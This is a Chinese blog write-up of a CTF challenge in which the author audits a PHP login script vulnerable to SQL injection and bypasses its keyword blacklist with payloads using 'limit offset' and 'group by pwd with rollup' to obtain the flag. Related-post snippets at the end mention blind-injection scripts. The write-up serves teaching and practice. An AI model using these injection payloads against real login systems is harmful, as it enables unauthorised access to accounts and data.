实验吧-因缺思汀的绕过

最新推荐文章于 2019-09-15 20:13:43 发布
最新推荐文章于 2019-09-15 20:13:43 发布
阅读量211 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/89504072
版权

F12查看源码,发现注释里有source.txt,猜测是源码文件,打开发现确实是源码。

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
	echo '<form action="" method="post">'."<br/>";
	echo '<input name="uname" type="text"/>'."<br/>";
	echo '<input name="pwd" type="text"/>'."<br/>";
	echo '<input type="submit" />'."<br/>";
	echo '</form>'."<br/>";
	echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
	die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "浜﹀彲璧涜墖锛�";
    }
}else{
	print "涓€棰楄禌鑹囷紒";
}
mysql_close($con);
?>

分析源码,首先用filter这个变量过滤了这些关键字and|select|from|where|union|join|sleep|benchmark|,|\(|\),相当于黑名单,然后发现sql变量,发现是之间将post的值传入,可以构造查询语句,接下来到数据库中查找uname等于我们输入的用户名的数据,如果查出来只有一条的话,则继续往下判断;否则,就输出“涓€棰楄禌鑹囷紒”。

查出来只有一条之后,再判断pwd列的数据是否等于我们输入的密码,相同则得到flag,否则输出“浜﹀彲璧涜墖锛�”。

接下来就是构造payload,利用limit 1(数量) offset 0(偏移量),这里由于过滤了逗号,所以不能使用limit 0,1.

1' or 1 limit 1 offset 0#  输出浜﹀彲璧涜墖锛� 说明第一行有数据
1' or 1 limit 1 offset 1#  输出浜﹀彲璧涜墖锛�,说明第两行有数据
1' or 1 limit 1 offset 2#  输出涓€棰楄禌鑹囷紒,说明这一行没有数据

 然后使用group by pwd with rollup,意思似乎是多一行用于统计,用MySQL自己测试了一下

我只插入了两行数据,第三行是由于这个语句产生的,所以我们就利用limit offset来读取第三行的数据,最后的payload如下

' or 1 group by pwd with rollup limit 1 offset 2 #

得到flag

CTF{with_rollup_interesting}

0ne_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF解题笔记(1)
CODING...
01-09 1万+
因缺思汀绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
实验吧-因缺思汀绕过WriteUp
焚卷觅光的博客
07-22 3066
实验吧-因缺思汀绕过WriteUp题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt--> 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过。! 这里有三层限制0X00在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如
实验因缺思汀绕过 By Assassin(with rollup统计)
Assassin
01-29 7318
这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!<?php error_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
因缺思汀绕过
3569
02-22 1966
阅读源码知道 保证查找内容可控就可以进行绕过 类似 union select 1,2 然后密码填写 2 题目源码 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo ''.""; echo ''.""; echo ''.""; echo ''."
一些因缺思汀的小实验1
08-03
以上实验揭示了 C++ 编程中几种常见操作的效率差异。通过对 `new` 和 `delete` 与 Buffer 的比较,我们可以了解到 Buffer 在处理大量小内存分配时的优势。同时,指针跳转和数组跳转的对比表明,在相似的内存布局中,...
spring-boot-demo-codegen.zip
05-22
Spring Boot 是一个流行的 Java 框架,它简化了创建独立、生产级别的基于Spring的应用程序。在本示例"spring-boot-demo-codegen.zip"中,我们聚焦于如何利用Spring Boot结合模板技术来实现代码自动化生成,这是一个...
泰山-开发规范.zip
05-22
所以本手册以 Java 开发者为中心视角,划分为编程规约、异常日志、单元测 试、安全规约、MySQL 数据库、工程结构、设计规约七个维度,再根据内容特征,细分成若干二级 子目录。另外,依据约束力强弱及故障敏感性,...
springboot_gradle.zip
05-22
这些都是Java开发中不可或缺的知识点,对于理解和实践现代Web应用的开发有着重要的指导意义。通过学习和实践这些内容,开发者能够提升项目构建效率,优化数据库操作,同时提供清晰的API文档,以及实现高效的分页查询...
ArcObjects ArcGIS 二次开发教程 C#
04-19
### ArcObjects ArcGIS 二次开发教程 C# #### 引言 随着地理信息系统(GIS)技术的发展,越来越多的应用场景需要定制化的GIS解决方案。ArcGIS作为一款功能强大的GIS平台,提供了丰富的API来支持用户进行二次开发。...
实验吧Writeup
千尺浪的博客
10-18 932
转载
实验吧 CTF
Risk2S的小博客
07-09 1210
登录一下好吗 ->运算符叫做“指向结构体成员运算符”,是C语言和C++语言的一个运算符,用处是使用一个指向结构体或对象的指针访问其内成员。 登录 用户名-> ‘=’ 密码-> ‘=’ 那么正常执行的SQL语句就是 select * from 表 where username = “$_POST[‘userneme’]” and password = “$_POST[‘passwo
BugkuCTF-进制转换
臭nana的博客
12-14 3872
打开题目发现是一串字符,根据题目提示是二进制,八进制,十进制,十六进制 很快能发现字符的规律,b开头的是二进制,o开头的是八进制,d开头的是十进制,x开头的是16进制,一个一个转换太慢了,就自己写了个脚本,由于自己学的是C语言,自学的Java,所以Java代码不是很好 package script; import java.util.Scanner; public class MC { ...
墨者学院-日志文件分析溯源(连接WebShell的IP地址)
臭nana的博客
09-15 327
下载文件打开后,直接ctrl+f查找php,找到一个疑似上传文件xiaoma.php,把ip填进去得到flag ​
Minesweeper
臭nana的博客
02-26 446
原题链接:http://www.dotcpp.com/oj/problem1096.html 主要是看懂题目,看懂其实就不难,大意是地雷的地方输出*,不是地雷的话就求出以自己为中心,自己附近的八个有几个雷,然后输出。 主要就是附近八个怎么求,用两个数组,或者像我一样用 for(int i=-1;i&lt;=1;i++)    for(int j=-1;j&lt;=1;j++) 3*3个数...
关于CTF学习总结
m0_37496212的博客
02-26 2846
# -*-coding:utf-8-*- import requests import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #不区分大小写的 flag = &amp;quot;&amp;quot; print(&amp;quot;Start&amp;quot;) for i in range(33): for payload in payloads: s
BugkuCTF-变量1
臭nana的博客
11-25 621
1.打开题目发现一段php代码,一个if判断语句,正则条件只匹配由数字、26个英文字母或者下划线组成的字符串 ,详情请看https://www.w3cschool.cn/regexp/6a7w1pr0.html 2.再看最后输出$$args,就相当于比如$args='a',输出$a一样 &lt;?php $a=123; $b='a'; echo $b; ?&gt; 输出就为123 3...
CTF题库>因缺思汀绕过
qq_42777804的博客
08-19 443
访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入,XSS等相关知识。涉及方向较多。此题主要涉及源码审计,MySQL相关的知识。 flag格式 CTF{} 我们访问网站之后 出现这个 我们要先进行查看源码 发现了 sourc...
墨者学院-SQL注入漏洞测试(布尔盲注)
臭nana的博客
05-29 1131
两种方法 一种是用穿山甲跑,直接得到用户名密码。 ​一种是使用python脚本跑,使用sqlmap也行,下面是我自己写的脚本 跑库名 (二分法查找)得到stormgroup importstring importrequests url="http://219.153.49.228:47151/new_list.php?id=1%s" payload="andascii(su...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值